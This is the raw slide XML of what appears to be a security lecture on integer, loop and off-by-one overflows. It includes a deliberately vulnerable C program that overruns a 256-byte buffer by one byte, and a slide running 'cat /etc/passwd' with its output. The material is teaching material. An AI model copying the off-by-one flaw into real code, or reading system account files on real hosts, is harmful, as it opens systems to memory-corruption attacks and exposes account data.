        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21870464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Integer of different sizes/types should be assigned with great care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows can make a large signed integer become a large negative value or a large unsigned integer become a small positive value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use assertions and similar checks to avoid overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75843622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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop overflows happen when the attacker can control the loop iterations and checks are missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A special case: off-by-one loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attacks are similar to array overflows, with the difference that only one element above the array capacity is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to modify the least significant byte of pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Frame Pointer Overwrite” by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 9(55), 1999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248456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E1EC-1669-2C25-1A6D-E87A47C35241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DCFE51-8F26-108C-1F8F-0CC72FDA8F4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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/passwd</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root:x:0:0:root:/root:/bin/bash</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daemon:x:1:1:daemon:/</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bin:x:2:2:bin:/bin:/</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sys:x:3:3:sys:/dev:/</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sync:x:4:65534:sync:/bin:/bin/sync</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nobody:x:65534:65534:nobody:/nonexistent:/</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vigna:x:1001:1001:Giovanni Vigna,,,:/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/bin/bash</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37002437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Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="228600"/>
            <a:ext cx="7848600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Off-by-one Overflow: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110020" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;</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err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sm</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char buffer[256];</a:t>
            </a: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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt;= 256; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</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buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</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err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt; 2) {</a:t>
            </a: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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    exit(-1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</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func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]);</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a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9958989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1206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111206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111206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
        <p:nvSpPr>
          <p:cNvPr id="111206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207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207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207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207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207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7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7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207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207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208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208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208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208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208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8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8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208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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111208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charset="0"/>
              </a:rPr>
              <a:t>func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112089" name="Text Box 25"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112090" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112083" idx="1"/>
            <a:endCxn id="1112066" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1890834" y="3414921"/>
            <a:ext cx="4586166" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112091" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112082" idx="1"/>
            <a:endCxn id="1112086"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12092" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112081" idx="1"/>
            <a:endCxn id="1112073" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3286125"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112093" name="Rectangle 29"/>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2095" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258715633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14118" name="Rectangle 6"/>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4119" name="Rectangle 7"/>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4120" name="Rectangle 8"/>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4121" name="Rectangle 9"/>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4122" name="Rectangle 10"/>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1"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="2476500"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114124" name="Oval 12"/>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25" name="Oval 13"/>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26" name="Oval 14"/>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4127" name="Rectangle 15"/>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4128" name="Rectangle 16"/>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4129" name="Rectangle 17"/>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4130" name="Rectangle 18"/>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4131" name="Rectangle 19"/>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4132" name="Rectangle 20"/>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4133" name="AutoShape 21"/>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34" name="AutoShape 22"/>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35" name="Rectangle 23"/>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4136" name="Text Box 24"/>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4137" name="Text Box 25"/>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4138" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114132"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114139" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114131" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1685925"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114140" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114130" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1685925"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114141" name="Rectangle 29"/>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4142" name="Rectangle 30"/>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4144" name="Text Box 32"/>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348485141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1616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616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616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616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616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617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7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7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617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617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617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617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617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617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618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8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8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618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618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6185" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116179" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4074349"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116186" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116178" idx="1"/>
            <a:endCxn id="1116175" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="485775"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116187" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116177" idx="1"/>
            <a:endCxn id="1116174" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1400175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38600005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116188"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6189" name="Rectangle 29"/>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6192" name="Text Box 32"/>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6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37"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8"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9"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51060560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1821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821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821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821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821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821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822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822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822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822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822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822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822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3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823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823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8233" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2895600" y="4572000"/>
            <a:ext cx="3581400" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
